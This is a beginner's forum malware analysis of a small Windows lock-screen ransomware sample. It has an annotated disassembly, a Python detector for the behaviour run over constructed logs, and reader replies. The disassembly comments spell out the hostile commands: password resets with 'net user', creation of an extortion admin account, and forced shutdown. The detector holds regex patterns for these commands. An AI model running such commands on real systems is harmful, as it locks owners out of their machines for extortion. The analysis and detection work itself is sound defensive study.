Analysis of a simple "lock-screen ransomware trojan"
I came across the sample in 轩少's post on the forum and found it fairly simple, so it is suitable for complete beginners to learn from. The sample is simple; experts, please go easy...
Sample name: 华夏联盟.exe
MD5: 0B1972462EC0041BF9711561CA1A1B45
SHA1: 700B448E07738CB82937983CA86C61A82F4E060D
CRC32: 5BAD5D4C
The trojan's main function is to put a password on the system's current account and on the administrator account, and to create a password-protected account named "加QQ1072890578解锁"; the logon password for all of these accounts is 107289. Below is the analysis of the trojan's main body:
; =============== S U B R O U T I N E =======================================
.data:00401100
.data:00401100 ; Attributes: bp-based frame
.data:00401100
.data:00401100 public start
.data:00401100 start proc near
.data:00401100
.data:00401100 var_1104 = byte ptr -1104h
.data:00401100 var_1103 = byte ptr -1103h
.data:00401100 var_D04 = byte ptr -0D04h
.data:00401100 var_D03 = byte ptr -0D03h
.data:00401100 var_904 = byte ptr -904h
.data:00401100 var_903 = byte ptr -903h
.data:00401100 CmdLine = byte ptr -504h
.data:00401100 var_503 = byte ptr -503h
.data:00401100 Buffer = byte ptr -104h
.data:00401100 var_103 = byte ptr -103h
.data:00401100 pcbBuffer = dword ptr -4
.data:00401100
.data:00401100 push ebp
.data:00401101 mov ebp, esp
.data:00401103 mov eax, 1104h
.data:00401108 call __alloca_probe; stack space allocation routine
.data:0040110D and , 0
.data:00401114 push ebx
.data:00401115 push esi
.data:00401116 push edi
.data:00401117 push 3Fh
.data:00401119 xor eax, eax
.data:0040111B pop ecx
.data:0040111C lea edi,
.data:00401122 rep stosd
.data:00401124 stosw
.data:00401126 stosb
.data:00401127 lea eax,
.data:0040112A mov , 100h
.data:00401131 push eax ; pcbBuffer: size of the buffer passed in
.data:00401132 lea eax,
.data:00401138 push eax ; lpBuffer: pointer to the buffer passed in
.data:00401139 call GetUserNameA ; get the current user name
.data:0040113F and , 0
.data:00401146 mov ecx, 0FFh
.data:0040114B xor eax, eax
.data:0040114D lea edi,
.data:00401153 rep stosd
.data:00401155 stosw
.data:00401157 mov ebx, wsprintfA; 将字符串或数值输入到缓冲区
.data:0040115D push offset a107289; "107289"
.data:00401162 stosb
.data:00401163 lea eax, ; current user name
.data:00401169 push eax
.data:0040116A push offset aNetUser ; "net user"
.data:0040116F lea eax,
.data:00401175 push offset aSSS ; format string '%s %s %s'
.data:0040117A push eax ; LPSTR output buffer
.data:0040117B call ebx ; wsprintfA ; wsprintf($CmdLine,"%s %s %s","net user",<current user name>,"107289")
.data:0040117B ; purpose of the string: set the current user's logon password to 107289
.data:0040117D mov esi, WinExec
.data:00401183 add esp, 14h
.data:00401186 lea eax,
.data:0040118C push 0 ; uCmdShow: how the window is shown; 0 means hidden, with no minimized icon
.data:0040118E push eax ; lpCmdLine: points to the command line string to execute
.data:0040118F call esi ; WinExec ; runs "net user <current user name> 107289"
.data:00401191 and , 0
.data:00401198 mov ecx, 0FFh
.data:0040119D xor eax, eax
.data:0040119F lea edi,
.data:004011A5 rep stosd
.data:004011A7 stosw
.data:004011A9 stosb
.data:004011AA push offset a107289; "107289"
.data:004011AF push offset aNetUserAdminis ; "net user administrator"
.data:004011B4 lea eax,
.data:004011BA push offset aSS ; "%s %s"
.data:004011BF push eax ; LPSTR
.data:004011C0 call ebx ; wsprintfA ; wsprintf($var_D04,"%s %s","net user administrator","107289")
.data:004011C0 ; sets the administrator account's password to 107289
.data:004011C2 add esp, 10h
.data:004011C5 lea eax,
.data:004011CB push 0 ; uCmdShow
.data:004011CD push eax ; lpCmdLine
.data:004011CE call esi ; WinExec ; runs the string "net user administrator 107289"
.data:004011D0 and , 0
.data:004011D7 mov edx, 0FFh
.data:004011DC mov ecx, edx
.data:004011DE xor eax, eax
.data:004011E0 lea edi,
.data:004011E6 and , 0
.data:004011ED rep stosd
.data:004011EF stosw
.data:004011F1 stosb
.data:004011F2 mov ecx, edx
.data:004011F4 xor eax, eax
.data:004011F6 lea edi,
.data:004011FC push offset dword_401080 ; "/add"
.data:00401201 rep stosd
.data:00401203 stosw
.data:00401205 stosb
.data:00401206 mov edi, offset loc_401068
.data:0040120B push offset a107289; "107289"
.data:00401210 push edi ; "加QQ1072890578解锁"
.data:00401211 push offset aNetUser ; "net user"
.data:00401216 push offset aSSSS ; "%s %s %s %s"
.data:0040121B lea eax,
.data:00401221 push eax ; LPSTR
.data:00401222 call ebx ; wsprintfA ; wsprintf($var_904,"%s %s %s %s","net user","加QQ1072890578解锁","107289","/add")
.data:00401224 push offset dword_401080 ; "/add"
.data:00401229 push edi ; user name
.data:0040122A push offset aNetLocalgroupA ; "net localgroup administrators"
.data:0040122F lea eax,
.data:00401235 push offset aSSS ; "%s %s %s"
.data:0040123A push eax ; LPSTR
.data:0040123B call ebx ; wsprintfA ; wsprintf($var_1104,"%s %s %s","net localgroup administrators","加QQ1072890578解锁","/add")
.data:0040123D add esp, 2Ch
.data:00401240 xor ebx, ebx
.data:00401242 lea eax,
.data:00401248 push ebx ; uCmdShow
.data:00401249 push eax ; lpCmdLine
.data:0040124A call esi ; WinExec ; runs the string "net user 加QQ1072890578解锁 107289 /add", creating a user with a password
.data:0040124C mov edi, Sleep
.data:00401252 push 0BB8h ; dwMilliseconds
.data:00401257 call edi ; Sleep
.data:00401259 lea eax,
.data:0040125F push ebx ; uCmdShow
.data:00401260 push eax ; lpCmdLine
.data:00401261 call esi ; WinExec ; runs "net localgroup administrators 加QQ1072890578解锁 /add", adding the newly created user to the administrators group to obtain administrator privileges
.data:00401263 push 1388h ; dwMilliseconds
.data:00401268 call edi ; Sleep
.data:0040126A push ebx ; uCmdShow
.data:0040126B push offset CmdLine; "shutdown -s -t 0"
.data:00401270 call esi ; WinExec ; shut down
.data:00401272 push ebx ; uCmdShow
.data:00401273 push offset aLogoff; "logoff"
.data:00401278 call esi ; WinExec ; log off
.data:0040127A pop edi
.data:0040127B pop esi
.data:0040127C xor eax, eax
.data:0040127E pop ebx
.data:0040127F leave
.data:00401280 retn 10h
.data:00401280 start endp
This is my first post on 吾爱; although the sample is very simple, I am still a bit excited and hope to learn more from the experts... Sample password: 52pojie
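The six WinExec calls above leave a very recognisable trail in process-creation telemetry: the parent binary spawns net.exe four times (two password resets, one account creation, one group addition), then shutdown.exe and logoff.exe, all within about nine seconds. The following detector is an added example, not code from the original post: it runs that correlation over a constructed set of process-creation records (a simplified subset of the fields Sysmon Event ID 1 / Security 4688 carry). Only the command lines, the 3 s and 5 s Sleep gaps and the file name 华夏联盟.exe come from the analysis; the paths, PIDs, timestamps and the "victim"/"alice" account names are made up.

```python
"""Detecting the account-lockout chain of the 华夏联盟.exe sample in process-creation logs.

Added example, not code from the original post. Event fields are a constructed
subset of what Sysmon Event ID 1 / Windows Security 4688 record; sample paths,
PIDs, timestamps and the 'victim'/'alice' account names are made up.
"""
import re
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class ProcEvent:
    ts: datetime          # process start time
    parent_pid: int       # PID of the process that called CreateProcess/WinExec
    parent_image: str     # full path of that parent
    image: str            # full path of the new process
    cmdline: str          # its command line


# Command name at the start of the line, optionally with a path, ".exe" and quotes.
_EXE = r'^\s*"?(?:[A-Za-z]:\\[^"]*\\)?{name}(?:\.exe)?"?'
NET_USER = re.compile(_EXE.format(name='net1?') +
                      r'\s+user\s+(?P<user>\S+)(?:\s+(?P<pwd>[^/\s]\S*))?(?P<add>\s+/add\b)?\s*$', re.I)
NET_LOCALGROUP = re.compile(_EXE.format(name='net1?') +
                            r'\s+localgroup\s+administrators\s+(?P<user>\S+)\s+/add\b', re.I)
SHUTDOWN = re.compile(_EXE.format(name='shutdown') + r'\s+.*[-/]s\b', re.I)
LOGOFF = re.compile(_EXE.format(name='logoff') + r'(?:\s.*)?$', re.I)


def classify(ev):
    """Map one event to a stage of the chain, or None if it plays no part in it."""
    m = NET_USER.match(ev.cmdline)
    if m:
        if m.group('add'):
            return 'account_created'
        if not m.group('pwd'):
            return None  # "net user <name>" alone only displays the account
        if m.group('user').lower() == 'administrator':
            return 'admin_password_reset'
        return 'password_reset'
    if NET_LOCALGROUP.match(ev.cmdline):
        return 'added_to_administrators'
    if SHUTDOWN.match(ev.cmdline):
        return 'forced_shutdown'
    if LOGOFF.match(ev.cmdline):
        return 'forced_logoff'
    return None


def find_lockout_chains(events, window=timedelta(seconds=60), min_stages=3):
    """Report parent processes that run at least `min_stages` distinct stages within
    `window`, or that both create an account and add one to administrators."""
    by_parent = defaultdict(list)
    for ev in sorted(events, key=lambda e: e.ts):
        stage = classify(ev)
        if stage:
            by_parent[(ev.parent_pid, ev.parent_image)].append((ev.ts, stage, ev.cmdline))

    findings = []
    for (ppid, pimage), hits in by_parent.items():
        for i, (t0, _, _) in enumerate(hits):
            in_win = [h for h in hits[i:] if h[0] - t0 <= window]
            stages = {h[1] for h in in_win}
            privileged_new_account = {'account_created', 'added_to_administrators'} <= stages
            if len(stages) >= min_stages or privileged_new_account:
                findings.append({
                    'parent_pid': ppid,
                    'parent_image': pimage,
                    'first_seen': t0,
                    'stages': stages,
                    # account names the parent created: what a responder has to remove
                    'rogue_accounts': [NET_USER.match(h[2]).group('user')
                                       for h in in_win if h[1] == 'account_created'],
                    'commands': [h[2] for h in in_win],
                })
                break  # one finding per parent is enough
    return findings


# --- constructed sample log ------------------------------------------------
_T0 = datetime(2016, 3, 16, 10, 0, 0)
_CMD = r'C:\Windows\System32\cmd.exe'
_NET = r'C:\Windows\System32\net.exe'
_MAL = r'C:\Users\victim\Downloads\华夏联盟.exe'  # constructed path; only the file name is from the post

SAMPLE_EVENTS = [
    # benign: an administrator looks up one account and then resets it from a console
    ProcEvent(_T0 - timedelta(minutes=5), 777, _CMD, _NET, 'net user alice'),
    ProcEvent(_T0 - timedelta(minutes=4), 777, _CMD, _NET, 'net user alice NewP@ssw0rd'),
    # the sample: its six WinExec calls, with the 3 s and 5 s Sleep() gaps from the disassembly
    ProcEvent(_T0, 1234, _MAL, _NET, 'net user victim 107289'),
    ProcEvent(_T0 + timedelta(milliseconds=200), 1234, _MAL, _NET, 'net user administrator 107289'),
    ProcEvent(_T0 + timedelta(milliseconds=400), 1234, _MAL, _NET, 'net user 加QQ1072890578解锁 107289 /add'),
    ProcEvent(_T0 + timedelta(seconds=3, milliseconds=400), 1234, _MAL, _NET,
              'net localgroup administrators 加QQ1072890578解锁 /add'),
    ProcEvent(_T0 + timedelta(seconds=8, milliseconds=400), 1234, _MAL,
              r'C:\Windows\System32\shutdown.exe', 'shutdown -s -t 0'),
    ProcEvent(_T0 + timedelta(seconds=8, milliseconds=500), 1234, _MAL,
              r'C:\Windows\System32\logoff.exe', 'logoff'),
]

if __name__ == '__main__':
    for f in find_lockout_chains(SAMPLE_EVENTS):
        print(f"{f['parent_image']} (pid {f['parent_pid']}) at {f['first_seen']}: "
              f"{sorted(f['stages'])}, rogue accounts {f['rogue_accounts']}")
```

The correlation key is the parent process, because a lone "net user <name> <password>" from an administrator's console is normal; it is the same parent creating an account, elevating it and then forcing a shutdown that marks this sample. The "rogue_accounts" field exists so the finding already names what has to be deleted, after which the two reset passwords still have to be changed. Note that net.exe hands most subcommands to net1.exe, so in real Sysmon data the net1.exe event has net.exe as its parent; feed the detector the first-level children of the suspect binary rather than the net1.exe grandchildren.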
ican2015, thank you for sharing first of all~
Reading your post I have gained a lot. Let me slowly read through and digest it first~~
Still learning, working at it~~
Passing by to show support, learning together
Learned something!!!
Worth looking into, thanks OP
What did you analyze it with?
For someone like me who hasn't got started yet, this is a good introduction~~!
Come on, lock me then
I've been schooled
完美剿灭OVG posted on 2016-3-16 16:04:
What did you analyze it with?
Because the sample is simple, I only used IDA.